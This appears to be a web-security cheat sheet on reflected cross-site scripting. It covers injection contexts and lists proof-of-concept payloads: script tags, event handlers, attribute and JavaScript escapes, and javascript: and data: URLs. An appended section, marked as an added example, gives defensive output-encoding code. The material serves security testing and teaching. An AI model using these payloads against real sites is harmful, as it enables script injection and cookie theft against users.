
Reflected XSS

CWE: CWE-79
Tools: dalfox
Difficulty: 🟡 intermediate

Exploit Reflected XSS

Reflected XSS occurs when user input is immediately returned in the HTTP response without output encoding appropriate to the context it lands in. The attack requires the victim to click a malicious link or submit a crafted form, because the payload lives only in the request and is never stored by the application.

Technical flow:

  1. You craft a URL with a malicious payload in a parameter
  2. Victim clicks the link (via phishing, social engineering, or watering hole)
  3. Server reflects the payload in the response without sanitization
  4. Victim's browser executes the payload in the application's context

Common Injection Contexts

HTML Context (between tags):

  • Input appears directly in HTML body: <p>Search results for: USER_INPUT</p>
  • Attack: <script>alert(1)</script>

HTML Attribute Context:

  • Input appears inside an attribute value: <input value="USER_INPUT">
  • Attack: " onmouseover="alert(1)" x="

JavaScript Context:

  • Input appears inside a <script> block: var search = "USER_INPUT";
  • Attack: ";alert(1)//

URL Context:

  • Input appears in href or src attributes: <a href="USER_INPUT">
  • Attack: javascript:alert(1)

CSS Context:

  • Input appears in style attributes or <style> blocks: <div style="background: USER_INPUT">
  • Attack: url('javascript:alert(1)')

Basic Payloads (No Filtering)

HTML Body:

<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe onload=alert(1)>
<input onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
<details open ontoggle=alert(1)>
<object data="javascript:alert(1)">
<embed src="javascript:alert(1)">

Attribute Escape:

" onmouseover="alert(1)
' onfocus='alert(1)' autofocus='
" autofocus onfocus="alert(1)
" onclick="alert(1)
"><script>alert(1)</script>
'><script>alert(1)</script>
"><img src=x onerror=alert(1)>

JavaScript Context Escape:

'-alert(1)-'
';alert(1)//
";alert(1)//
\';alert(1)//
</script><script>alert(1)</script>

URL Parameter Injection:

javascript:alert(1)
data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
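The defensive counterpart to the contexts and payload lists above, as an added example that is not part of this cheat sheet or of dalfox: one encoder per injection context, applied to the search-page template from the contexts section. The base URL `https://app.example/` and the page layout are assumptions.

```javascript
// Added example (not from the original page): context-aware output encoding for
// the reflection points named in "Common Injection Contexts". The encoder is
// chosen by where the value lands in the response, not by what it contains.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// HTML body and quoted-attribute context: the five characters that can end
// text content or an attribute value. Attributes must always be quoted.
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// JavaScript string-literal context: \uXXXX-escape every character outside
// [A-Za-z0-9], so quotes, backslashes and "</script>" cannot leave the literal.
function encodeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// URL context (href/src): allow-list http(s). The WHATWG URL parser lowercases
// the scheme and strips leading whitespace and embedded tab/newline, so case and
// whitespace variations of "javascript:" and "data:" are normalised before the
// check. Relative paths resolve against the (assumed) site origin.
function safeUrl(value) {
  try {
    const u = new URL(String(value), 'https://app.example/');
    if (u.protocol === 'http:' || u.protocol === 'https:') return encodeHtml(u.href);
  } catch (e) { /* not a parsable URL */ }
  return '#';
}

// The search-page template from the contexts section, each slot encoded for its
// own context. One encoder for all four slots would leave at least one open.
function renderSearchPage(q) {
  return [
    `<p>Search results for: ${encodeHtml(q)}</p>`,
    `<input value="${encodeHtml(q)}">`,
    `<script>var search = "${encodeJsString(q)}";</script>`,
    `<a href="${safeUrl(q)}">link</a>`,
  ].join('\n');
}
```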